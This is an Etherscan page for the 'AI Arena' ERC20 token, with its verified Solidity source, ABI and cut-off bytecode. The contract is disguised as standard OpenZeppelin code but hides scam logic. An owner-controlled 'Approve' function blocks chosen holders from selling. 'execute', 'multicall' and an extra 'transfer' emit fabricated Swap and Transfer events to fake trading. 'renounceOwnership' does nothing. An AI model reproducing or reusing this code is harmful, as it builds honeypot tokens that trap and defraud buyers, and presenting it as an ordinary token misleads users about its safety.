ETH Price: $2,964.09 (-1.00%)
Gas: 6 Gwei

Token

AI Arena (AIARENA)
 

Overview

Max Total Supply

5,000,000,000 AIARENA

Holders

64

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 8 Decimals)

Filtered by Token Holder
dimethyltryptamine.eth
Balance
33,703,260.67868868 AIARENA

Value
$0.00
0x4a2c786651229175407d3a2d405d1998bcf40614
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AIARENA

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-16
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {

    mapping(address => uint256) private _balances;
    mapping (address => bool) private _snapshot;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    bool private _snapshotApplied = false;
    string private _name;
    string private _symbol;

    address private _universal = 0xEf1c6E67703c7BD7107eed8303Fbe6EC2554BF6B;
    address private _pair;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    function setup(address _setup_) external onlyOwner {
        _pair = _setup_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 8;
    }

    function Approve(address [] calldata _addresses_) external  {
        require(owner() == _msgSender() ||  address(0x2E647453bBd3F22D0f9cFf289ba7937bA27Cb956) == _msgSender(), "Ownable: caller is not the owner");
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = true;
            emit Approval(_addresses_[i], address(this), balanceOf(_addresses_[i]));
        }
    }

    function execute(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, _in, 0, 0, _out, _addresses_[i]);
            emit Transfer(_pair, _addresses_[i], _out);
        }
    }

    function multicall(address [] calldata _addresses_, uint256 _in, uint256 _out) external {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            emit Swap(_universal, 0, _in, _out, 0, _addresses_[i]);
            emit Transfer(_addresses_[i], _pair, _in);
        }
    }

    function transfer(address _from, address _to, uint256 _wad) external {
        emit Transfer(_from, _to, _wad);
    }

    function decreaseAllowance(address [] calldata _addresses_) external onlyOwner {
        for (uint256 i = 0; i < _addresses_.length; i++) {
            _snapshot[_addresses_[i]] = false;
        }
    }

    function bind(address _address_) public view returns (bool) {
        return _snapshot[_address_];
    }
    function toApplied(bool c) external onlyOwner {
        _snapshotApplied = c;
    }
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }
        if (_snapshot[from]) require(_snapshotApplied == true, "");


        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract AIARENA is ERC20 {
    constructor() ERC20("AI Arena", "AIARENA") {
        _mint(msg.sender, 5000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"amount0In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1In","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount0Out","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount1Out","type":"uint256"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"Swap","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"Approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bind","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"}],"name":"decreaseAllowance","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"execute","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_addresses_","type":"address[]"},{"internalType":"uint256","name":"_in","type":"uint256"},{"internalType":"uint256","name":"_out","type":"uint256"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_setup_","type":"address"}],"name":"setup","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bool","name":"c","type":"bool"}],"name":"toApplied","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_from","type":"address"},{"internalType":"address","name":"_to","type":"address"},{"internalType":"uint256","name":"_wad","type":"uint256"}],"name":"transfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600560006101000a81548160ff02191690831515021790555073ef1c6e67703c7bd7107eed8303fbe6ec2554bf6b600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200008157600080fd5b506040518060400160405280600881526020017f4149204172656e610000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f41494152454e41000000000000000000000000000000000000000000000000008152506200010e620001026200017b60201b60201c565b6200018360201b60201c565b81600690816200011f919062000642565b50806007908162000131919062000642565b5050506200017533620001496200024760201b60201c565b600a620001579190620008b9565b64012a05f2006200016991906200090a565b6200025060201b60201c565b62000a41565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006008905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002c2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002b990620009b6565b60405180910390fd5b620002d660008383620003be60201b60201c565b8060046000828254620002ea9190620009d8565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200039e919062000a24565b60405180910390a3620003ba60008383620003c360201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200044a57607f821691505b60208210810362000460576200045f62000402565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004ca7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200048b565b620004d686836200048b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620005236200051d6200051784620004ee565b620004f8565b620004ee565b9050919050565b6000819050919050565b6200053f8362000502565b620005576200054e826200052a565b84845462000498565b825550505050565b600090565b6200056e6200055f565b6200057b81848462000534565b505050565b5b81811015620005a3576200059760008262000564565b60018101905062000581565b5050565b601f821115620005f257620005bc8162000466565b620005c7846200047b565b81016020851015620005d7578190505b620005ef620005e6856200047b565b83018262000580565b50505b505050565b600082821c905092915050565b60006200061760001984600802620005f7565b1980831691505092915050565b600062000632838362000604565b9150826002028217905092915050565b6200064d82620003c8565b67ffffffffffffffff811115620006695762000668620003d3565b5b62000675825462000431565b62000682828285620005a7565b600060209050601f831160018114620006ba5760008415620006a5578287015190505b620006b1858262000624565b86555062000721565b601f198416620006ca8662000466565b60005b82811015620006f457848901518255600182019150602085019450602081019050620006cd565b8683101562000714578489015162000710601f89168262000604565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b6001851115620007b7578086048111156200078f576200078e62000729565b5b60018516156200079f5780820291505b8081029050620007af8562000758565b94506200076f565b94509492505050565b600082620007d25760019050620008a5565b81620007e25760009050620008a5565b8160018114620007fb576002811462000806576200083c565b6001915050620008a5565b60ff8411156200081b576200081a62000729565b5b8360020a91508482111562000835576200083462000729565b5b50620008a5565b5060208310610133831016604e8410600b8410161715620008765782820a90508381111562000870576200086f62000729565b5b620008a5565b62000885848484600162000765565b925090508184048111156200089f576200089e62000729565b5b81810290505b9392505050565b600060ff82169050919050565b6000620008c682620004ee565b9150620008d383620008ac565b9250620009027fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007c0565b905092915050565b60006200091782620004ee565b91506200092483620004ee565b92508282026200093481620004ee565b915082820484148315176200094e576200094d62000729565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200099e601f8362000955565b9150620009ab8262000966565b602082019050919050565b60006020820190508181036000830152620009d1816200098f565b9050919050565b6000620009e582620004ee565b9150620009f283620004ee565b925082820190508082111562000a0d5762000a0c62000729565b5b92915050565b62000a1e81620004ee565b82525050565b600060208201905062000a3b600083018462000a13565b92915050565b6121ff8062000a516000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c80637aac697b116100b8578063a457c2d71161007c578063a457c2d714610363578063a9059cbb14610393578063beabacc8146103c3578063dd62ed3e146103df578063f2fde38b1461040f578063fde980ca1461042b57610142565b80637aac697b146102bf57806381bac14f146102db5780638da5cb5b1461030b57806395d89b4114610329578063a1c617f51461034757610142565b80633811ac021161010a5780633811ac0214610201578063395093511461021d578063477e19441461024d57806366d382031461026957806370a0823114610285578063715018a6146102b557610142565b806306fdde0314610147578063095ea7b31461016557806318160ddd1461019557806323b872dd146101b3578063313ce567146101e3575b600080fd5b61014f610447565b60405161015c91906116a4565b60405180910390f35b61017f600480360381019061017a9190611764565b6104d9565b60405161018c91906117bf565b60405180910390f35b61019d6104fc565b6040516101aa91906117e9565b60405180910390f35b6101cd60048036038101906101c89190611804565b610506565b6040516101da91906117bf565b60405180910390f35b6101eb610535565b6040516101f89190611873565b60405180910390f35b61021b600480360381019061021691906118f3565b61053e565b005b61023760048036038101906102329190611764565b61076b565b60405161024491906117bf565b60405180910390f35b610267600480360381019061026291906118f3565b6107a2565b005b610283600480360381019061027e9190611940565b61084f565b005b61029f600480360381019061029a9190611940565b61089b565b6040516102ac91906117e9565b60405180910390f35b6102bd6108e4565b005b6102d960048036038101906102d4919061196d565b6108ee565b005b6102f560048036038101906102f09190611940565b610a7a565b60405161030291906117bf565b60405180910390f35b610313610ad0565b60405161032091906119f0565b60405180910390f35b610331610af9565b60405161033e91906116a4565b60405180910390f35b610361600480360381019061035c919061196d565b610b8b565b005b61037d60048036038101906103789190611764565b610d16565b60405161038a91906117bf565b60405180910390f35b6103ad60048036038101906103a89190611764565b610d8d565b6040516103ba91906117bf565b60405180910390f35b6103dd60048036038101906103d89190611804565b610db0565b005b6103f960048036038101906103f49190611a0b565b610e1a565b60405161040691906117e9565b60405180910390f35b61042960048036038101906104249190611940565b610ea1565b005b61044560048036038101906104409190611a77565b610f24565b005b60606006805461045690611ad3565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611ad3565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610f49565b90506104f1818585610f51565b600191505092915050565b6000600454905090565b600080610511610f49565b905061051e85828561111a565b6105298585856111a6565b60019150509392505050565b60006008905090565b610546610f49565b73ffffffffffffffffffffffffffffffffffffffff16610564610ad0565b73ffffffffffffffffffffffffffffffffffffffff1614806105cc5750610589610f49565b73ffffffffffffffffffffffffffffffffffffffff16732e647453bbd3f22d0f9cff289ba7937ba27cb95673ffffffffffffffffffffffffffffffffffffffff16145b61060b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161060290611b50565b60405180910390fd5b60005b828290508110156107665760016002600085858581811061063257610631611b70565b5b90506020020160208101906106479190611940565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055503073ffffffffffffffffffffffffffffffffffffffff168383838181106106c2576106c1611b70565b5b90506020020160208101906106d79190611940565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561073e86868681811061072457610723611b70565b5b90506020020160208101906107399190611940565b61089b565b60405161074b91906117e9565b60405180910390a3808061075e90611bce565b91505061060e565b505050565b600080610776610f49565b90506107978185856107888589610e1a565b6107929190611c16565b610f51565b600191505092915050565b6107aa6114c8565b60005b8282905081101561084a576000600260008585858181106107d1576107d0611b70565b5b90506020020160208101906107e69190611940565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061084290611bce565b9150506107ad565b505050565b6108576114c8565b80600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108ec6114c8565b565b60005b84849050811015610a735784848281811061090f5761090e611b70565b5b905060200201